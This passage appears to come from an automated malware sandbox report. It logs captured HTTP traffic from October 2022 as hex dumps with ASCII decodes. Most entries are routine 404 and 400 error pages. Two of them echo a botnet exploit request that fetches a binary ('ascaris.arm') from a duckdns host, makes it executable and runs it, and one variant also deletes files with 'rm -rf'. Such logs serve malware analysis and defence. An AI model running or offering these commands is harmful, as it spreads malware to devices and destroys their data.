63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 64 6d 69 6e 65 72 2e 64 73 70 74 79 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:57:29 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 309Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.21.6Date: Sun, 23 Oct 2022 15:57:29 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.21.6</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:29 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 271Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 37 3a 32 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:57:29 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 301Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 23 Oct 2022 15:57:30 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 0Connection: closeContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 16:03:29 GMTServer: Apache/2X-Powered-By: PHP/7.3.27Vary: Accept-Encoding,User-AgentContent-Length: 364Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 2b 77 67 65 74 2b 68 74 74 70 3a 2f 5c 2f 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 61 72 6d 3b 2b 63 68 6d 6f 64 2b 37 37 37 2b 61 73 63 61 72 69 73 2e 61 72 6d 3b 2b 2e 2f 61 73 63 61 72 69 73 2e 61 72 6d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 20 53 65 72 76 65 72 20 61 74 20 73 68 61 72 65 64 2e 64 6f 6d 61 69 6e 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell?cd+/tmp;+wget+http:/\/amkbins.duckdns.org/bins/ascaris.arm;+chmod+777+ascaris.arm;+./ascaris.arm was not found on this server.</p><hr><address>Apache/2 Server at shared.domain Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 17:59:57 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 17:49:35 GMTServer: WebsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-XSS-Protection: 1;mode=blockCache-Control: no-storeContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-type: text/htmlContent-Length: 0Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:05 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 33 20 4f 63 74 20 32 30 32 32 20 31 35 3a 35 37 3a 30 35 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 36 20 28 43 65 6e 74 4f 53 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 30 2e 32 6b 2d 66 69 70 73 20 50 48 50 2f 37 2e 32 2e 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 32 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>HTTP/1.1 400 Bad RequestDate: Sun, 23 Oct 2022 15:57:05 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34Content-Length: 226Connection: closeContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Sun, 23 Oct 2022 15:57:35 GMTContent-Type: text/htmlContent-Length: 671Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 5f 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 2b 72 6d 2b 2d 72 66 2b 2a 3b 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 61 6d 6b 62 69 6e 73 2e 64 75 63 6b 64 6e 73 2e 6f 72 67 2f 62 69 6e 73 2f 61 73 63 61 72 69 73 2e 61 72 6d 37 3b 2b 63 68 6d 6f 64 2b 37 37 37 2b 61 73 63 61 72 69 73 2e 61 72 6d 37 3b 2b 2e 2f 61 73 63 61 72 69 73 2e 61 72 6d 37 2b 6a 61 77 73 2e 73 65 6c 66 72 65 70 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 6c 61 78 35 2d 37 30 39 2d 73 65 32 34 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 32 2f 31 30 2f 32 33 20 32 33 3a 35 37 3a 33 35 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://_/shell?cd+/tmp;+rm+-rf+*;+wget+http://amkbins.duckdns.org/bins/ascaris.arm7;+chmod+777+ascaris.arm7;+./ascaris.arm7+jaws.selfrep</td></tr><tr><td>Server:</td><td>lax5-709-se24</td></tr><tr><td>Date:</td><td>2022/10/23 23:57:35</td></tr></table><hr/>Powered by Tengine<hr><center>tengine</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:35 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:35 GMTServer: ApacheContent-Length: 217Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Sun, 23 Oct 2022 15:57:35 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 23 Oct 2022 15:57:35 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 23 Oct 2022 15:57:37 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 33 0d 0a 34 30 34 0d 0a 31 0d 0a 20 0d 0a 39 0d 0a 4e 6f 74 20 46 6f 75 6e 64 0d 0a 31 66 63 61 0d 0a 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 